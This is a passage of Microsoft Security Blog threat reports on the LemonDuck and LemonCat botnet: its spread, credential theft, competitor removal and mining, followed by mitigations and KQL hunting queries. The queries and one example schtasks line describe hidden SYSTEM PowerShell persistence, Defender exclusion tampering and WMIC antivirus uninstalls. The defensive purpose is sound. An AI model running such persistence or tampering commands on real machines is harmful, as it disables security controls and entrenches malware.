If they aren\u2019t, a copy of _Readme.js_, as well as subcomponents of _IF.Bin_, are downloaded into the drive\u2019s home directory as hidden files.\n\nSimilarly, _IF.Bin_ attempts to brute-force and exploit vulnerabilities in SMB, SQL, and other services to move laterally. It then immediately contacts the C2 for downloads.\n\nAnother tool dropped and utilized within this lateral movement component is a bundled Mimikatz, within a _mimi.dat_ file associated with both the \u201cCat\u201d and \u201cDuck\u201d infrastructures. This tool\u2019s function is to facilitate credential theft for additional actions. In conjunction with credential theft, _IF.Bin_ drops additional .BIN files to attempt common service exploits like CVE-2017-8464 (LNK remote code execution vulnerability) to increase privilege.\n\nThe attackers regularly update the internal infection components that the malware scans for. They then attempt brute-force or spray attacks, as well as exploits against available SSH, MSSQL, SMB, Exchange, RDP, REDIS and Hadoop YARN for Linux and Windows systems. A sample of ports that recent LemonDuck infections were observed querying includes 70001 (as printed; this exceeds the 16-bit port range, so it is presumably a transcription error), 8088, 16379, 6379, 22, 445, and 1433.\n\nOther functions built in and updated in this lateral movement component include mail self-spreading. This spreading functionality evaluates whether a compromised device has Outlook. If so, it accesses the mailbox and scans for all available contacts. It sends the initiating infecting file as part of a .zip, .js, or .doc/.rtf file with a static set of subjects and bodies. The mail metadata count of contacts is also sent to the attacker, likely to evaluate its effectiveness, such as in the following command:\n\n\n\n## Competition removal and host patching\n\nAt installation and repeatedly afterward, LemonDuck goes to great lengths to remove all other botnets, miners, and competitor malware from the device. 
It does this via _KR.Bin_, the \u201cKiller\u201d script, which gets its name from its function calls. This script attempts to remove services, network connections, and other evidence from dozens of competitor malware via scheduled tasks. It also closes well-known mining ports and removes popular mining services to preserve system resources. The script even removes the mining service it intends to use and simply reinstalls it afterward with its own configuration.\n\nThis \u201cKiller\u201d script is likely a continuation of older scripts that were used by other botnets such as GhostMiner in 2018 and 2019. The older variants of the script were quite small in comparison, but they have since grown, with additional services added in 2020 and 2021. Presently, LemonDuck seems consistent in naming its variant _KR.Bin_. This process spares the scheduled tasks created by LemonDuck itself, including various PowerShell scripts as well as a task called \u201cblackball\u201d, \u201cblutea\u201d, or \u201crtsa\u201d, which has been in use by all LemonDuck\u2019s infrastructures for the last year along with other task names.\n\nThe attackers were also observed manually re-entering an environment, especially in instances where edge vulnerabilities were used as an initial entry vector. The attackers also patch the vulnerability they used to enter the network to prevent other attackers from gaining entry. As mentioned, the attackers were seen using a copy of a Microsoft-provided mitigation tool for Exchange ProxyLogon vulnerability, which they hosted on their infrastructure, to ensure other attackers don\u2019t gain web shell access the way they had. 
If unmonitored, this scenario could lead to a situation where a system no longer appears to be unpatched, so suspicious activity that occurred before patching is ignored or thought to be unrelated to the vulnerability.\n\n## Weaponization and continued impact\n\nA miner implant is downloaded as part of the monetization mechanism of LemonDuck. The implant used is usually XMRig, which is a favorite of GhostMiner malware, the [Phorpiex botnet](<https://www.microsoft.com/security/blog/2021/05/20/phorpiex-morphs-how-a-longstanding-botnet-persists-and-thrives-in-the-current-threat-environment/>), and other malware operators. The file uses any of the following names:\n\n * _M6.bin_\n * _M6.bin.ori_\n * _M6G.bin_\n * _M6.bin.exe_\n * _<File name that follows the regex pattern M[0-9]{1}[A-Z]{1}>.BIN._\n\nOnce the automated behaviors are complete, the threat goes into a consistent check-in behavior, simply mining and reporting out to the C2 infrastructure and mining pools as needed with encoded PowerShell commands such as those below (decoded):\n\n\n\nOther systems that are affected bring in secondary payloads such as Ramnit, a widespread Trojan that has been seen dropped by other malware in the past. Additional backdoors, other malware implants, and activity continuing long after initial infection demonstrate that even a \u201csimple\u201d infection by coin mining malware like LemonDuck can persist and bring more dangerous threats into the enterprise.\n\n## Comprehensive protection against a wide-ranging malware operation\n\nThe cross-domain visibility and coordinated defense delivered by [Microsoft 365 Defender](<https://www.microsoft.com/en-us/microsoft-365/security/microsoft-365-defender>) is designed for the wide range and increasing sophistication of threats that LemonDuck exemplifies. 
Below we list mitigation actions, detection information, and advanced hunting queries that Microsoft 365 Defender customers can use to harden networks against threats from LemonDuck and other malware operations.\n\n### Mitigations\n\nApply these mitigations to reduce the impact of LemonDuck. Check the recommendations card for the deployment status of monitored mitigations.\n\n * Prevent threats from arriving via removable storage devices by blocking these devices on sensitive endpoints. If you allow removable storage devices, you can minimize the risk by turning off autorun, enabling real-time antivirus protection, and blocking untrusted content. [Learn about stopping threats from USB devices and other removable media](<https://docs.microsoft.com/windows/security/threat-protection/device-control/control-usb-devices-using-intune>).\n * Ensure that Linux and Windows devices are included in routine patching, and validate protection against the CVE-2019-0708, CVE-2017-0144, CVE-2017-8464, CVE-2020-0796, CVE-2021-26855, CVE-2021-26858, and CVE-2021-27065 vulnerabilities, as well as against brute-force attacks in popular services like SMB, SSH, RDP, SQL, and others.\n * [Turn on PUA protection](<https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-antivirus/detect-block-potentially-unwanted-apps-windows-defender-antivirus>). Potentially unwanted applications (PUA) can negatively impact machine performance and employee productivity. 
In enterprise environments, PUA protection can stop adware, torrent downloaders, and coin miners.\n * Turn on [tamper protection features](<https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-antivirus/prevent-changes-to-security-settings-with-tamper-protection>) to prevent attackers from stopping security services.\n * Turn on [cloud-delivered protection](<https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-antivirus/enable-cloud-protection-microsoft-defender-antivirus>) and automatic sample submission on Microsoft Defender Antivirus. These capabilities use artificial intelligence and machine learning to quickly identify and stop new and unknown threats.\n * Encourage users to use Microsoft Edge and other web browsers that support SmartScreen, which identifies and blocks malicious websites, including phishing sites, scam sites, and sites that contain exploits and host malware. [Turn on network protection](<https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-atp/enable-network-protection>) to block connections to malicious domains and IP addresses.\n * Check your [Office 365 antispam policy](<https://docs.microsoft.com/microsoft-365/security/office-365-security/configure-your-spam-filter-policies>) and your [mail flow rules](<https://docs.microsoft.com/microsoft-365/security/office-365-security/create-safe-sender-lists-in-office-365#recommended-use-mail-flow-rules>) for allowed senders, domains and IP addresses. [Apply extra caution](<https://docs.microsoft.com/exchange/troubleshoot/antispam/cautions-against-bypassing-spam-filters>) when using these settings to bypass antispam filters, even if the allowed sender addresses are associated with trusted organizations\u2014Office 365 will honor these settings and can let potentially harmful messages pass through. 
[Review system overrides in threat explorer](<https://docs.microsoft.com/microsoft-365/security/office-365-security/threat-explorer#system-overrides>) to determine why attack messages have reached recipient mailboxes.\n\n### Attack surface reduction\n\nTurn on the following attack surface reduction rules, to block or audit activity associated with this threat:\n\n * [Block executable content from email client and webmail](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-executable-content-from-email-client-and-webmail>)\n * [Block JavaScript or VBScript from launching downloaded executable content](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-javascript-or-vbscript-from-launching-downloaded-executable-content>)\n * [Block Office applications from creating executable content](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-office-applications-from-creating-executable-content>)\n * [Block all office applications from creating child processes](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-all-office-applications-from-creating-child-processes>)\n * [Block executable files from running unless they meet a prevalence, age, or trusted list criterion](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-executable-files-from-running-unless-they-meet-a-prevalence-age-or-trusted-list-criterion>)\n * [Block execution of potentially obfuscated scripts](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-execution-of-potentially-obfuscated-scripts>)\n * [Block persistence through WMI event 
subscription](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-persistence-through-wmi-event-subscription>)\n * [Block process creations originating from PSExec and WMI commands](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-process-creations-originating-from-psexec-and-wmi-commands>)\n\n### Antivirus detections\n\nMicrosoft Defender Antivirus detects threat components as the following malware:\n\n * TrojanDownloader:PowerShell/LemonDuck!MSR\n * TrojanDownloader:Linux/LemonDuck.G!MSR\n * Trojan:Win32/LemonDuck.A\n * Trojan:PowerShell/LemonDuck.A\n * Trojan:PowerShell/LemonDuck.B\n * Trojan:PowerShell/LemonDuck.C\n * Trojan:PowerShell/LemonDuck.D\n * Trojan:PowerShell/LemonDuck.E\n * Trojan:PowerShell/LemonDuck.F\n * Trojan:PowerShell/LemonDuck.G\n * TrojanDownloader:PowerShell/LodPey.A\n * TrojanDownloader:PowerShell/LodPey.B\n * Trojan:PowerShell/Amynex.A\n * Trojan:Win32/Amynex.A\n\n### Endpoint detection and response (EDR) alerts\n\nAlerts with the following titles in the security center can indicate threat activity on your network:\n\n * LemonDuck botnet C2 domain activity\n * LemonDuck malware\n\nThe following alerts might also indicate threat activity associated with this threat. 
These alerts, however, can be triggered by unrelated threat activity and are not monitored in the status cards provided with this report.\n\n * Suspicious PowerShell command line\n * Suspicious remote activity\n * Suspicious service registration\n * Suspicious Security Software Discovery\n * Suspicious System Network Configuration Discovery\n * Suspicious sequence of exploration activities\n * Suspicious Process Discovery\n * Suspicious System Owner/User Discovery\n * Suspicious System Network Connections Discovery\n * Suspicious Task Scheduler activity\n * Suspicious Microsoft Defender Antivirus exclusion\n * Suspicious behavior by cmd.exe was observed\n * Suspicious remote PowerShell execution\n * Suspicious behavior by svchost.exe was observed\n * A WMI event filter was bound to a suspicious event consumer\n * Attempt to hide use of dual-purpose tool\n * System executable renamed and launched\n * Microsoft Defender Antivirus protection turned off\n * Anomaly detected in ASEP registry\n * A script with suspicious content was observed\n * An obfuscated command line sequence was identified\n * A process was injected with potentially malicious code\n * A malicious PowerShell Cmdlet was invoked on the machine\n * Suspected credential theft activity\n * Outbound connection to non-standard port\n * Sensitive credential memory read\n\n### Advanced hunting\n\nThe LemonDuck botnet is highly varied in its payloads and delivery methods after email distribution, so it can sometimes evade alerts. You can use the advanced hunting capability in Microsoft 365 Defender and Microsoft Defender for Endpoint to surface activities associated with this threat.\n\n**NOTE:** The following sample queries let you search for a week's worth of events. 
To explore up to 30 days' worth of raw data to inspect events in your network and locate potential LemonDuck-related indicators for more than a week, go to the **Advanced Hunting** page > **Query** tab, select the calendar drop-down menu and update your query to hunt for the **Last 30 days**.\n\n**LemonDuck template subject lines**\n\nLooks for subject lines used from 2020 to 2021 by dropped scripts that attach malicious LemonDuck samples to emails and mail them to the contacts of mailboxes on impacted machines. Additionally, checks whether attachments are present. Attachment types to check for at present are .DOC, .ZIP or .JS, though these, like the subjects themselves, could change. [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAG2RQUvDQBCF31nwP-ytCnroUUElxEoEUUirxWOiXRuNicSkpeCP99vJepESZnYz8-a9mdmZPlWoUq2ZNlqpUa9vHepAP3Laak2sw5zmGlTqnfsLGEdNgz_SRAtDOc4OTM-fUyuPT_WgJ93qWqea6gzsCfY_6mBKqdiYypcpVHRVRxVPzmmpjLqRIVOiO_Qy4gk8gW1ONtezzo0_x-7JOcvleiQfasNkE7gWuolcS_otbKI-zuHRH_QR82-ot3olXmpHfox6asJetlhtndbcer6wrxFTcmvhWdmmvG35rz7srGLTLvodyAF82FyHWmC5Ane89y0SUyroc837ja-WGkNjk1zqAj_VLyyp2szeAQAA&runQuery=true&timeRangeId=week>)\n\n`EmailEvents \n| where Subject in ('The Truth of COVID-19','COVID-19 nCov Special info WHO','HALTH ADVISORY:CORONA VIRUS', \n'WTF','What the fcuk','good bye','farewell letter','broken file','This is your order?') \n| where AttachmentCount >= 1`\n\n**LemonDuck Botnet Registration Functions**\n\nLooks for runs of a function named \u201cSIEX\u201d, which within the LemonDuck initializing scripts is used to assign a specific user-agent for reporting back to command-and-control infrastructure. This query should be accompanied by additional surrounding logs showing successful downloads from component sites. 
[Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAG2PuwrCQBRETy34D4ufIViID7ATYmFhE9yAAV9oMIgm3-7ZLQRBhvtgmJm7O6fiQc3euXCrONNwZ8iAN4GWg9zNCkxVNWovajY8uWZ2IgIj1vJt1hbZcxQzuZModUQ1_1OjqL_Jpb6le0qIviRd6O3pxoud_Tc1MePcC1b-YZv3zvoA7T5fgtwAAAA&runQuery=true&timeRangeId=week>)\n\n`DeviceEvents \n| where ActionType == \"PowerShellCommand\" \n| where AdditionalFields =~ \"{\\\"Command\\\":\\\"SIEX\\\"}\"`\n\n**LemonDuck keyword identification**\n\nLooks for known LemonDuck keyword variations in the command lines of processes initiated by PowerShell. All results should reflect LemonDuck behavior; however, there are variants of LemonDuck that might not use this term explicitly, so validate with additional hunting queries based on known TTPs. [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAJ2NQQrCMBBF_1rwDqErBfEGrqyCUKQ3kKLFBpsojdoKHt7nbESX8pnM8P7MT65ad3nt6aU6nW1KaAWvFXVlHmukp5x6NbCOctrgeVyvyt6o40_CGtoyb9kIdrNATpkubPWWlCyxRXP6QGV__rZkDqjCO6iwnfdlA0naGX9oQn4BD2xHaK4bCSfo7Mv58Klezaq6iiQBAAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where InitiatingProcessFileName == \"powershell.exe\" \n| where InitiatingProcessCommandLine has_any(\"Lemon_Duck\",\"LemonDuck\")`\n\n**LemonDuck Microsoft Defender tampering**\n\nLooks for a command line event where LemonDuck or other similar malware might attempt to modify Defender by disabling real-time monitoring functionality or adding entire drive letters to the exclusion criteria. The exclusion additions will often succeed even if tamper protection is enabled due to the design of the application. Custom alerts could be created in an environment for particular drive letters common in the environment. 
[Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAKWRzQqCQBSFzzroHcRVgT1EpIugIKp9mFoappL9LXr4vhkNrJUQl5m53jPnnOsdX4nuyhRxrnRRabOaCKgnKnQldzTUQC_Oh1KqF5ajOWgGnim0e6Hjj8aM_EyEYLEW9o5hplRq7dhzwtFIrjYgV020VGVVEh1ap8LqufK46cpHpYa5h5lozTIqxv9MvsSx6aqE2_T0YU7pIe7hEOjJd64bPpnV-_4rV-PORCqLncAiXJ1eE_D-mJ7h-p1Xm4OZ2radQI1aSFbpDTwRAUzcAQAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where InitiatingProcessCommandLine has_all (\"Set-MpPreference\", \"DisableRealtimeMonitoring\", \"Add-MpPreference\", \"ExclusionProcess\") \n| project ProcessCommandLine, InitiatingProcessCommandLine, DeviceId, Timestamp`\n\n**Antivirus uninstallation attempts**\n\nLooks for WMIC command lines that enumerate installed products by name and call their uninstall method non-interactively, filtered to the security product names LemonDuck has been observed removing. Extend the name list to cover the products deployed in your environment; uninstall attempts against products that are not deployed at all are a particularly strong signal, as noted above. 
[Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEALWQzUrEQBCE6yz4DiEnF0SfwIP4A6IsguBVQja4wyaTMBN_FsRn97M2u6LeBBl6plPdVV2dczV6VlDNe6uk3lnmXIA3ihrJ97WnNxV60RIsEYWuqAWqQZXvqMcfCpegLfmcjs6cE71zl-h0nnkE-kqUf5xwRt5xKmoL3bjnk7kEyXrgbjkH6A_mLfQEd_w2p9QhEXceW1RWO7yeNAqY0foZ_gbbdByD9a6MVqw8IfjvlZr922ZRa292bWSwdrbz9eSswkNlv1_fw5Rn-mp2SvaxZTTGt_2n3inonkj05gmf4y1R6akXuvulNNMH1HgRaFYCAAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where InitiatingProcessFileName =~ \"wmic.exe\" \n| where InitiatingProcessCommandLine has_all(\"product where\",\"name like\",\"call uninstall\",\"/nointeractive\") \n| where InitiatingProcessCommandLine has_any(\"Kaspersky\",\"avast\",\"avp\",\"security\",\"eset\",\"AntiVirus\",\"Norton Security\")`\n\n**Known LemonDuck component script installations**\n\nLooks for instances of the callback actions which attempt to obfuscate detection while downloading supporting scripts such as those that enable the \u201cKiller\u201d and \u201cInfection\u201d functions for the malware as well as the mining components and potential secondary functions. Options for more specific instances included to account for environments with potential false positives. Most general versions are intended to account for minor script or component changes such as changing to utilize non .bin files, and non-common components. 
[Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAN2QzWrCUBCFz1roO1xctSC60p2rVlEQ8Q0kJrYJJlGS-Ac-vN8dA9rgwm3LMHcm58zPmXxprYMShcSFCm0tK7ER-Fq5KvI3tXSR01ExWIE7TeES2ESBvbl-GhPGoCn5nIrMenyV07va2lF3tFmlzUyxLvGEt9XBQ3qiB-zjqYpXdHySZ1gAF2lmNb43Bim15PXbvaoePQ4uhNuSVcw513oiU5xTvwdNNaxxr7LfqEmJAV-RaQpq9qZjR3_Fjoltj-0yB1Pw-gv__j2e62pluu7X_Z_bNsy83-eRRN8NJNPg1z-4At8RQUloAwAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where InitiatingProcessFileName in (\"powershell.exe\",\"cmd.exe\") \n| where InitiatingProcessCommandLine has_all(\"/c echo try\",\"down_url=\",\"md5\",\"downloaddata\",\"ComputeHash\") or \nInitiatingProcessCommandLine has_all(\"/c echo try\",\"down_url=\",\"md5\",\"downloaddata\",\"ComputeHash\",\".bin\") or \nInitiatingProcessCommandLine has_all(\"/c echo try\",\"down_url=\",\"md5\",\"downloaddata\",\"ComputeHash\",\"kr.bin\",\"if.bin\",\"m6.bin\")`\n\n**LemonDuck named scheduled task creation**\n\nLooks for instances where LemonDuck creates statically named scheduled tasks, and for a semi-unique task creation pattern LemonDuck also uses: a task running as SYSTEM that launches a hidden PowerShell process, paired with a randomly generated task name. An example with a randomly generated name is: `"schtasks.exe" /create /ru system /sc MINUTE /mo 60 /tn fs5yDs9ArkV\\2IVLzNXfZV/F /tr "powershell -w hidden -c PS_CMD"`. 
[Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAKWS0WrCQBBF77PgPyx5UrD6BX3S-mRLwQ8o2ygoGpXdtGlB_PaenSQlFV-kLLO53Jmde3eyM631qa1yvq8KOhqKrCf4tQ4qwX31dJZTpQ1cIJzmnNqDXuRVGPOoC3tGfU5dCR-1I8Zkv4jsZp-_qlNwwfIor7RA42BVG-s2oMeE2nTSo5B6Dv_d9c3476Z7CXZ6526e8zuQB-_Jja7yH-bAX2WCTcybM4duYE8O73WUNG_dt9YKqNc44jxarvjNpj_Q4gKlrsMWzztsaPCJ2spmGG2WyYPTA1xytsXpyt5E4nKb8hKvUz1rZvf9AWK9PVhOAgAA&runQuery=true&timeRangeId=week>)

```kusto
DeviceProcessEvents
| where FileName =~ "schtasks.exe"
| where ProcessCommandLine has "/create"
| where ProcessCommandLine has_any("/tn blackball","/tn blutea","/tn rtsa") or
ProcessCommandLine has_all("/create","/ru","system","/sc","/mo","/tn","/F","/tr","powershell -w hidden -c PS_CMD")
```

**Competition killer script scheduled task execution**

Looks for instances of the LemonDuck component KR.Bin, which is intended to kill competition prior to making the installation and persistence of the malware concrete. The killer script used is based off historical versions from 2018 and earlier, which have grown over time to include scheduled task and service names of various botnets, malware, and other competing services. The version currently in use by LemonDuck has approximately 40-60 scheduled task names. The upper maximum in this query can be modified, and the query can be adjusted to include time bounding.
[Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAJWRT0_CQBDF35nE79D0BAkRDhw4oBeqCQbUxD_XBguxhlpMW8EaP7y_HQppiATMZmZnZt_MvLwNNNdKb4q475VpaVHOuaI-V6qC-EwN_cjTWjG1DPP20EPid86UjpnGTEwNFVPJFeITTlM-WUS1sPoCOwf3hflqYx0FxAlW1GqPut3F1_jWjlGuz2pvxs5v2-myBVHIq5vTPIlri84XlfigpskIxHaX41mYJrMKteX5zMTEmLj9F5jjk-FLWCTW8woyhsuGU3gip7-U_8-E-g-ksHE_MOHOyTeKPtDnuJZVfme8I2Pt6YZ4hXl60gdzp7V_WaKyf4DjYXUuTZ-euqbSMS0Hhu6D_gUG3Q8GqgIAAA&runQuery=true&timeRangeId=week>)

```kusto
DeviceProcessEvents
| where ProcessCommandLine has_all("schtasks.exe","/Delete","/TN","/F")
| summarize make_set(ProcessCommandLine) by DeviceId
| extend DeleteVolume = array_length(set_ProcessCommandLine)
| where set_ProcessCommandLine has_any("Mysa","Sorry","Oracle Java Update","ok")
| where DeleteVolume >= 40 and DeleteVolume <= 80
```

**LemonDuck hosts file adjustment for dynamic C2 downloads**

Looks for a PowerShell event wherein LemonDuck attempts to simultaneously retrieve the IP address of a C2 and modify the hosts file with the retrieved address. The address is then attributed to a name that does not exist and is randomly generated. The script then instructs the machine to download data from the address. This query has a more general and a more specific version, allowing the detection of this technique if other activity groups were to utilize it.
[Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAMWQuwrCYAyFzyz4DqWTgvgGDmK9gYigu5S22IK20op18OH9Erro4OAiIZc_OTknbaRMdxVKyDvVqrxqsDn9TKVu1H319FSgVjm9Gg-0ZlYwLRR7LHX6YFjQPVNvQVx8Z4IFCnUF1TpT44xnbEx-4OGPajPqCxYzS7VxjG3mdBodiaYygH9J_6YV-IY8BZ26irFYDDXCDZN0dd5hbTaE0y6s2PnHXWv432cHNvZs1J3-9_vtHfn_L9Gt0E952_Wxf90Lt1_r6hICAAA&runQuery=true&timeRangeId=week>)

```kusto
DeviceProcessEvents
| where InitiatingProcessFileName == "powershell.exe"
| where InitiatingProcessCommandLine has_all("GetHostAddresses","etc","hosts")
or InitiatingProcessCommandLine has_all("GetHostAddresses","IPAddressToString","etc","hosts","DownloadData")
```

[Learn how your organization can stop attacks through automated, cross-domain security and built-in AI with Microsoft 365 Defender](<https://www.microsoft.com/en-us/microsoft-365/security/microsoft-365-defender>).

The post [When coin miners evolve, Part 2: Hunting down LemonDuck and LemonCat attacks](<https://www.microsoft.com/security/blog/2021/07/29/when-coin-miners-evolve-part-2-hunting-down-lemonduck-and-lemoncat-attacks/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "published": "2021-07-29T19:00:59", "type": "mssecure", "title": "When coin miners evolve, Part 2: Hunting down LemonDuck and LemonCat attacks", "bulletinFamily": "blog", "cvelist": ["CVE-2017-0144", "CVE-2017-8464", "CVE-2019-0708", "CVE-2020-0796", "CVE-2021-26855", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-07-29T19:00:59", "id": "MSSECURE:4A6B394DCAF12E05136AE087248E228C", "href": "https://www.microsoft.com/security/blog/2021/07/29/when-coin-miners-evolve-part-2-hunting-down-lemonduck-and-lemoncat-attacks/"}, {"lastseen": "2021-07-30T00:08:30", "description": "_[Note: In this two-part blog series, we expose a modern malware infrastructure and provide guidance for protecting against the wide range of threats it enables. Part 1 covers the evolution of the threat, how it spreads, and how it impacts organizations. [Part 2](<https://www.microsoft.com/security/blog/2021/07/29/when-coin-miners-evolve-part-2-hunting-down-lemonduck-and-lemoncat-attacks/>) is a deep dive on the attacker behavior and will provide investigation guidance.]_

Combating and preventing today's threats to enterprises requires comprehensive protection focused on addressing the full scope and impact of attacks. Anything that can gain access to machines, even so-called commodity malware, can bring in more dangerous threats. We’ve seen this in banking Trojans serving as an entry point for ransomware and hands-on-keyboard attacks. LemonDuck, an actively updated and robust malware that’s primarily known for its botnet and cryptocurrency mining objectives, followed the same trajectory when it adopted more sophisticated behavior and escalated its operations.
Today, beyond using resources for its traditional bot and mining activities, LemonDuck steals credentials, removes security controls, spreads via emails, moves laterally, and ultimately drops more tools for human-operated activity.

LemonDuck’s threat to enterprises also lies in the fact that it’s a cross-platform threat. It’s one of a few documented bot malware families that targets Linux systems as well as Windows devices. It uses a wide range of spreading mechanisms (phishing emails, exploits, USB devices, brute force, among others), and it has shown that it can quickly take advantage of news, events, or the release of new exploits to run effective campaigns. For example, in 2020, it was observed using COVID-19-themed lures in email attacks. In 2021, it exploited newly patched [Exchange Server vulnerabilities](<https://www.microsoft.com/security/blog/2021/03/25/analyzing-attacks-taking-advantage-of-the-exchange-server-vulnerabilities/>) to gain access to outdated systems.

This threat, however, does not just limit itself to new or popular vulnerabilities. It continues to use older vulnerabilities, which benefit the attackers at times when focus shifts to patching a popular vulnerability rather than investigating compromise. Notably, LemonDuck removes other attackers from a compromised device by getting rid of competing malware and preventing any new infections by patching the same vulnerabilities it used to gain access.

In the early years, LemonDuck targeted China heavily, but its operations have since expanded to include many other countries, focusing on the manufacturing and IoT sectors. Today, LemonDuck impacts a very large geographic range, with the United States, Russia, China, Germany, the United Kingdom, India, Korea, Canada, France, and Vietnam seeing the most encounters.

_Figure 1. 
Global distribution of LemonDuck botnet activity_

In 2021, LemonDuck campaigns started using more diversified command and control (C2) infrastructure and tools. This update supported the marked increase in hands-on-keyboard actions post-breach, which varied depending on the perceived value of compromised devices to the attackers. Despite all these upgrades, however, LemonDuck still utilizes C2s, functions, script structures, and variable names for far longer than the average malware. This is likely due to its use of bulletproof hosting providers such as Epik Holdings, which are unlikely to take any part of the LemonDuck infrastructure offline even when reported for malicious actions, allowing LemonDuck to persist and continue to be a threat.

In-depth research into malware infrastructures of various sizes and operations provides invaluable insight into the breadth of threats that organizations face today. In the case of LemonDuck, the threat is cross-platform, persistent, and constantly evolving. Research like this emphasizes the importance of having comprehensive visibility into the wide range of threats, as well as the ability to correlate simple, disparate activity such as coin mining to more dangerous adversarial attacks.

## LemonDuck and LemonCat infrastructure

The earliest documentation of LemonDuck was from its cryptocurrency campaigns in May 2019. These campaigns included PowerShell scripts that employed additional scripts kicked off by a scheduled task. The task was used to bring in the PCASTLE tool to achieve a couple of goals: abuse the EternalBlue SMB exploit, as well as use brute force or pass-the-hash to move laterally and begin the operation again. Many of these behaviors are still observed in LemonDuck campaigns today.

LemonDuck is named after the variable “Lemon_Duck” in one of these PowerShell scripts. The variable is often used as the user agent, in conjunction with assigned numbers, for infected devices. 
The format used two sets of alphabetical characters separated by dashes, for example: “User-Agent: Lemon-Duck-[A-Z]-[A-Z]”. The term still appears in PowerShell scripts, as well as in many of the execution scripts, specifically in a function called SIEX, which is used to assign a unique user-agent during botnet connection in attacks as recently as June 2021.

LemonDuck frequently utilizes open-source material built off of resources also used by other botnets, so there are many components of this threat that would seem familiar. Microsoft researchers are aware of two distinct operating structures, which both use the LemonDuck malware but are potentially operated by two different entities for separate goals.

The first, which we call the “Duck” infrastructure, uses the historical infrastructure discussed in this report. It is highly consistent in running campaigns and performs limited follow-on activities. This infrastructure is seldom seen in conjunction with edge device compromise as an infection method, is more likely to have random display names for its C2 sites, and is always observed using “Lemon_Duck” explicitly in its scripts.

The second infrastructure, which we call the “Cat” infrastructure (for primarily using two domains with the word “cat” in them: _sqlnetcat[.]com_ and _netcatkit[.]com_), emerged in January 2021. It was used in attacks exploiting vulnerabilities in Microsoft Exchange Server. Today, the Cat infrastructure is used in attacks that typically result in backdoor installation, credential and data theft, and malware delivery. 
It is often seen delivering the malware Ramnit.

**Sample Duck domains**

 * cdnimages[.]xyz
 * bb3u9[.]com
 * zz3r0[.]com
 * pp6r1[.]com
 * amynx[.]com
 * ackng[.]com
 * hwqloan[.]com
 * js88[.]ag
 * zer9g[.]com
 * b69kq[.]com

**Sample Cat domains**

 * sqlnetcat[.]com
 * netcatkit[.]com
 * down[.]sqlnetcat[.]com

The Duck and Cat infrastructures use similar subdomains, and they use the same task names, such as “blackball”. Both infrastructures also utilize the same packaged components hosted on similar or identical sites for their mining, lateral movement, and competition-removal scripts, as well as many of the same function calls.

The fact that the Cat infrastructure is used for more dangerous campaigns does not deprioritize malware infections from the Duck infrastructure. Instead, this intelligence adds important context for understanding this threat: the same set of tools, access, and methods can be re-used at dynamic intervals, to greater impact. Despite common implications that cryptocurrency miners are less threatening than other malware, their core functionality mirrors that of non-monetized software, making any botnet infection worthy of prioritization.

_Figure 2. LemonDuck attack chain from the Duck and Cat infrastructures_

## Initial access

LemonDuck spreads in a variety of ways, but the two main methods are (1) compromises that are either edge-initiated or facilitated by bot implants moving laterally within an organization, or (2) bot-initiated email campaigns.

LemonDuck acts as a loader for many other follow-on activities, but one of its main functions is to spread by compromising other systems. 
Since its first appearance, the LemonDuck operators have leveraged scans against both Windows and Linux devices for open or weakly authenticated SMB, Exchange, SQL, Hadoop, REDIS, RDP, or other edge devices that might be vulnerable to password spray or application vulnerabilities like CVE-2017-0144 (EternalBlue), CVE-2017-8464 (LNK RCE), CVE-2019-0708 (BlueKeep), CVE-2020-0796 (SMBGhost), CVE-2021-26855 (ProxyLogon), CVE-2021-26857 (ProxyLogon), CVE-2021-26858 (ProxyLogon), and CVE-2021-27065 (ProxyLogon).

Once inside a system with an Outlook mailbox, as part of its normal exploitation behavior, LemonDuck attempts to run a script that utilizes the credentials present on the device. The script instructs the mailbox to send copies of a phishing message with preset messages and attachments to all contacts.

Because of this method of contact messaging, security controls that rely on determining if an email is sent from a suspicious sender don’t apply. This means that email security policies that reduce scanning or coverage for internal mail need to be re-evaluated, as sending emails through contact scraping is very effective at bypassing email controls.

From mid-2020 to March 2021, LemonDuck’s email subjects and body content have remained static, as have the attachment names and formats. 
These attachment names and formats have changed very little from similar campaigns that occurred in early 2020.

**Sample email subjects**

 * The Truth of COVID-19
 * COVID-19 nCov Special info WHO
 * HALTH ADVISORY:CORONA VIRUS
 * WTF
 * What the fcuk
 * good bye
 * farewell letter
 * broken file
 * This is your order?

**Sample email body content**

 * Virus actually comes from United States of America
 * very important infomation for Covid-19
 * see attached document for your action and discretion.
